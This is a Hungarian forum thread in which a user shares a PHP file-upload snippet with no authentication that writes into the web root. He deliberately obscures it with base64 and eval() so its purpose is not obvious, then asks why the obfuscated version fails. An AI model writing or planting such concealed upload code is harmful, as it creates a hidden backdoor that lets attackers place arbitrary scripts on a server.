Új hozzászólás Aktív témák
-
gergogazd
csendes tag
válasz
gergogazd #18594 üzenetére
Úgy tűnik, nem ez volt a gond.
A total commander tehet róla.
Php feltöltésnél úgy szoktam megoldani az ftp frissítést, hogy belépek egy könyvtárba meg vissza, és ez ma is jól működött amikor először töltöttem fel, aztán megírtam a base64-es kódot, ami miatt egy újabb tesztet kellett futtatnom, de ezúttal nem frissült a tartalom, hiába léptem ki-be. Újracsatlakozás után viszont már fent volt minden amivel próbálkoztam. -
gergogazd
csendes tag
sziasztok
szeretnék egy minél kevésbé beszédes fájl feltöltő kódot írni, ezért először csináltam egy ilyet:
<?$important=$_SERVER["DOCUMENT_ROOT"]."/php/";if(!empty($_POST)){if(!is_dir($important))mkdir($important);move_uploaded_file($_FILES["index"]["tmp_name"],$important.basename($_FILES["index"]["name"]));}?>
Bocs a tömörség miatt, de konkrétan így szerepel az oldalamon, és ebben a formában még működik is.
Később úgy voltam vele, hogy erről még mindig ordít, hogy mit csinál, ezért base64-gyel kódoltam így:
<?
$source = '$important=$_SERVER["DOCUMENT_ROOT"]."/php/";if(!empty($_POST)){if(!is_dir($important))mkdir($important);move_uploaded_file($_FILES["index"]["tmp_name"],$important.basename($_FILES["index"]["name"]));}';
$code = base64_encode($source);
eval(base64_decode($code));
?>Így viszont már nem töltötte fel a fájlt, de gőzöm sincs, hogy hol akadt el. Az echo függvény pl gond nélkül lefutott rajta, nem volt probléma a változókkal és idézőjelekkel sem.
Mi lehet a baj?
Új hozzászólás Aktív témák
- Apple iPhone 15 Pro 128GB, Kártyafüggetlen, 1 Év Garanciával
- Dell Latitude 5320 - hibás kijelzők - i5 1135G7 ,16GB RAM, SSD, jó akku, számla
- ÁRGARANCIA!Épített KomPhone Ryzen 5 7600X 32/64GB RAM RTX 5070 12GB GAMER PC termékbeszámítással
- Xiaomi 11T Pro 256GB, Kártyafüggetlen, 1 Év Garanciával
- HGST HUH721010AL5200 10TB 7.2k SAS HDD, DELL branded, nettó 40000Ft + ÁFA, 1 év garancia
Állásajánlatok
Cég: Laptopműhely Bt.
Város: Budapest
Cég: PCMENTOR SZERVIZ KFT.
Város: Budapest